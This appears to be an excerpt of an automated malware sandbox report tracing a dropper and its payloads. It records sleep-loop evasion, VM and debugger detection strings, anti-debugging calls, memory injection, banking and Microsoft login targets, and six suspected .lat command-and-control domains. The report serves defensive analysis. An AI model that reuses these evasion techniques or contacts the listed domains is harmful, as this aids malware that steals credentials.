                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.1 %
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7432Thread sleep count: 109 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7432Thread sleep time: -218109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7276Thread sleep count: 110 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7276Thread sleep time: -220110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7420Thread sleep count: 249 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7420Thread sleep time: -7470000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7504Thread sleep count: 4732 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7504Thread sleep time: -9468732s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7564Thread sleep count: 108 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7564Thread sleep time: -216108s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5792Thread sleep count: 108 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5792Thread sleep time: -216108s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7504Thread sleep count: 3548 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7504Thread sleep time: -7099548s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1364Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 7600Thread sleep time: -2351175s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 7316Thread sleep time: -2339169s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 3620Thread sleep time: -36000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 7292Thread sleep time: -2415207s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 352Thread sleep time: -50000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 7300Thread sleep time: -2375187s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe TID: 7312Thread sleep time: -2387193s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 6268Thread sleep count: 1269 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 6268Thread sleep time: -2539269s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 3728Thread sleep count: 1264 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 3728Thread sleep time: -2529264s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 3972Thread sleep time: -40000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 3328Thread sleep count: 1137 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 3328Thread sleep time: -2275137s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 4632Thread sleep count: 1246 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 4632Thread sleep time: -2493246s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 2448Thread sleep count: 1261 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe TID: 2448Thread sleep time: -2523261s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 2388Thread sleep time: -48024s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 2456Thread sleep time: -50025s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 8180Thread sleep time: -32000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 8124Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 2396Thread sleep time: -34017s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe TID: 3112Thread sleep time: -44022s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5140Thread sleep count: 1234 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5140Thread sleep time: -2469234s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 3180Thread sleep count: 1195 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 3180Thread sleep time: -2391195s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 7164Thread sleep count: 1245 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 7164Thread sleep time: -2491245s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 2084Thread sleep time: -36000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5920Thread sleep count: 1227 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5920Thread sleep time: -2455227s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5680Thread sleep count: 1223 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 5680Thread sleep time: -2447223s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 1708Thread sleep count: 1235 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 1708Thread sleep time: -2471235s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 1320Thread sleep count: 1237 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 1320Thread sleep time: -2475237s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 3280Thread sleep count: 1225 > 30
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe TID: 3280Thread sleep time: -2451225s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00977978 FindFirstFileW,FindFirstFileW,free,20_2_00977978
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0097881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,20_2_0097881C
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0097B5E0 GetSystemInfo,20_2_0097B5E0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000004.00000000.2253099995.0000000001132000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 0000000E.00000000.2738793459.0000000001132000.00000080.00000001.01000000.00000007.sdmp, d5cd5e4aa8.exe, 0000002E.00000002.4002520006.000000000099C000.00000040.00000001.01000000.00000011.sdmp, ea17d0b77a.exe, 0000002F.00000003.3623331328.0000000005FB5000.00000004.00000800.00020000.00000000.sdmp, file.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: file.exeBinary or memory string: ventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: explorer.exe, 00000028.00000002.3026870349.000000000086B000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.000000000108C000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4214117571.00000000007A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: PING.EXE, 00000026.00000002.3036848767.0000025FD786D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: PING.EXE, 0000002B.00000002.3060586838.0000024E3AE59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: 9434b989db.exe, 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: file.exe, 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmp, d5cd5e4aa8.exe, 0000002E.00000002.4002520006.000000000099C000.00000040.00000001.01000000.00000011.sdmp, ea17d0b77a.exe, 0000002F.00000003.3623331328.0000000005FB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: ea17d0b77a.exe, 0000002F.00000003.3315305813.00000000059D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: 352def4414.exe, 0000002D.00000003.3089465558.0000000006741000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_3-9994
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_3-10015
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeThread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: SIWVID
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeSystem information queried: KernelDebuggerInformation
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\explorer.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04C90C79 rdtsc 0_2_04C90C79
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_009B66A8 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,20_2_009B66A8
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5652B mov eax, dword ptr fs:[00000030h]0_2_00B5652B
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5A302 mov eax, dword ptr fs:[00000030h]0_2_00B5A302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F6A302 mov eax, dword ptr fs:[00000030h]3_2_00F6A302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00F6652B mov eax, dword ptr fs:[00000030h]3_2_00F6652B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F6A302 mov eax, dword ptr fs:[00000030h]4_2_00F6A302
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 4_2_00F6652B mov eax, dword ptr fs:[00000030h]4_2_00F6652B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeMemory protected: page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: 9434b989db.exe PID: 7128, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 140000000 value: 4D
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 140001000 value: 40
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 1402DD000 value: 58
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 14040B000 value: A4
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 140739000 value: 00
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 14075E000 value: 48
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 14075F000 value: 48
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 140762000 value: 48
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 140764000 value: 00
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 140765000 value: 00
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 6432 base: 4F2010 value: 00
                    Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                    Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                    Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                    Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                    Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                    Source: ea17d0b77a.exe, 0000002F.00000003.3220505212.0000000004E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
